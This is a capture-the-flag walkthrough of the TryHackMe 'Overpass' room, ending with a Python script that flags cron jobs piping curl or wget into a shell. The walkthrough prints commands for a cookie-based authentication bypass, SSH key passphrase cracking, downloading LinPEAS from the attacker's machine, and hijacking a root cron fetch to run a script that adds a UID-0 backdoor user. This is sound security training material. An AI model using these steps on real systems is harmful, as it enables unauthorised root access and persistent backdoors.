OverPass – TryHackMe Walkthrough

featured Anonhack.in Walkthrough hacking

In this walkthrough, we’ll be tackling the Overpass room on TryHackMe. This room is a realistic web application challenge that includes a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path. Let’s get started!

Machine Details:
  • OS: Linux
  • Difficulty: Easy
  • Skills Required: Web Enumeration, SSH, Privilege Escalation

Step 1: Initial Reconnaissance with Nmap

Start by scanning the target machine using Nmap to identify open ports and services:

nmap -p- <target-ip>

The scan reveals the following ports:

  • Port 22: SSH
  • Port 80: HTTP

The HTTP server is a Go server but doesn’t appear to have obvious vulnerabilities. This sets the stage for further enumeration.


Step 2: Web Enumeration to Discover Hidden Directories

Navigate to the web server on port 80, where you’ll find a simple webpage mentioning a project called “Overpass.” Next, run a directory brute-force scan using Gobuster:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/directory-list-2.3-medium.txt

This scan will reveal the /admin directory, which contains an admin login page.

Finding the Admin Login

Upon inspecting the login page, you’ll realize that conventional login attempts won’t work. The page source references two interesting files: login.js and cookie.js. The check in cookie.js is flawed: the SessionToken cookie is not validated properly, so any value is accepted.

By using a browser extension like Cookie Editor, you can add a SessionToken with a random value, which allows you to bypass authentication and access the admin panel. Inside, you’ll find an SSH private key for a user named James.


Step 3: Cracking the SSH Key Passphrase

The SSH key is protected with a passphrase, which you can crack using John the Ripper:

  1. Convert the key to a format John can read:
     ssh2john privatesshkeyfile > overpass.hash
  2. Crack the passphrase using John:
     john overpass.hash --wordlist=/usr/share/wordlists/rockyou.txt

After successfully cracking the passphrase “james13”, log in over SSH with the key:

ssh -i <privatesshkeyfilename> james@<target-ip>

Once inside, you’ll find the first flag in the user.txt file.

Bonus: Decoding James’s Hidden Password

In James’s home directory, you’ll find a hidden file named .overpass, which contains his SSH password encoded with ROT13. Decoding it gives you the password:

Step 4: Privilege Escalation to Root

Now it’s time to escalate privileges. After checking for SUID binaries and running sudo -l, the next step is to run LinPEAS for a more thorough system enumeration.

  1. Host a Python web server on your attacking machine:
     python3 -m http.server 8080
  2. Download and execute LinPEAS on the target machine (the server listens on port 8080, so include it in the URL):
     wget http://<your-ip>:8080/linpeas.sh
     chmod +x linpeas.sh
     ./linpeas.sh

LinPEAS reveals a cron job running every minute as root:

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

To exploit this, edit /etc/hosts on the target so that overpass.thm resolves to your attacking machine:

vim /etc/hosts
<your-ip> overpass.thm

Now, host a malicious buildscript.sh on your Python server:

useradd -ou 0 -g 0 newroot
echo "newroot:password" | chpasswd

Once the cron job runs, it will download and execute your script, creating a new root user. Log in with the new user and grab the root flag from the /root directory.
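From the defender’s side, the cron entry that LinPEAS surfaced is the entire root path: a job running as root that pipes an unauthenticated download straight into bash. The script below is an added example, not part of the original walkthrough or the room, that parses /etc/crontab-style entries and flags any that pipe curl or wget output into a shell; the sample crontab is constructed, and only the overpass.thm line comes from this box.

```python
import re

# Constructed sample /etc/crontab (system format: five time fields, the user
# to run as, then the command). The overpass.thm line mirrors the entry LinPEAS
# surfaced on this box; the other entries are made up for contrast.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
0 3 * * * backup /usr/local/bin/backup.sh
*/5 * * * * www-data wget -qO- http://updates.internal/agent.sh | sh -s
0 4 * * * deploy curl -fsSL https://deploy.internal/rollout.sh | bash
@reboot root /usr/bin/sleep 10 && /opt/start.sh
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
HTTPS_URL = re.compile(r"https://", re.IGNORECASE)

def parse_system_crontab(text):
    """Yield (schedule, user, command) from /etc/crontab-style text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as SHELL=/bin/sh
        n = 1 if line.startswith("@") else 5  # @reboot etc. is one field
        parts = line.split(None, n + 1)
        if len(parts) < n + 2:
            continue  # malformed entry, nothing to inspect
        yield " ".join(parts[:n]), parts[n], parts[n + 1]

def find_pipe_to_shell(text):
    """Return cron entries that pipe curl/wget output into a shell, rated."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if not (DOWNLOADER.search(command) and PIPE_TO_SHELL.search(command)):
            continue
        # Root, or a plain-HTTP fetch (curl defaults to http when no scheme is
        # given, as with overpass.thm), turns the entry into a host takeover.
        critical = user == "root" or not HTTPS_URL.search(command)
        findings.append({"schedule": schedule, "user": user,
                         "command": command,
                         "severity": "critical" if critical else "high"})
    return findings

if __name__ == "__main__":
    for f in find_pipe_to_shell(SAMPLE_CRONTAB):
        print(f"[{f['severity']}] {f['schedule']} {f['user']}: {f['command']}")
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; per-user crontabs lack the user column and would need the field count adjusted.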